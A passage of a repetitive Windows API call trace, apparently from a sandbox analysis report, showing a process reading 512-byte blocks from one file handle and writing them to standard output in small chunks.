lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.861] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.861] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.861] GetFileType (hFile=0x50) returned 0x1 [0119.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] GetFileType (hFile=0x50) returned 0x1 [0119.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.862] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.863] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.863] GetFileType (hFile=0x50) returned 0x1 [0119.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] GetFileType (hFile=0x50) returned 0x1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] GetFileType (hFile=0x50) returned 0x1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] GetFileType (hFile=0x50) returned 0x1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] GetFileType (hFile=0x50) returned 0x1 [0119.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.864] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.865] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.865] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] GetFileType (hFile=0x50) returned 0x1 [0119.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.865] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.866] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.866] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.866] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.867] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.867] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.867] GetFileType (hFile=0x50) returned 0x1 [0119.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] GetFileType (hFile=0x50) returned 0x1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.868] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.869] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.869] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] GetFileType (hFile=0x50) returned 0x1 [0119.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.869] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.870] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.870] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, 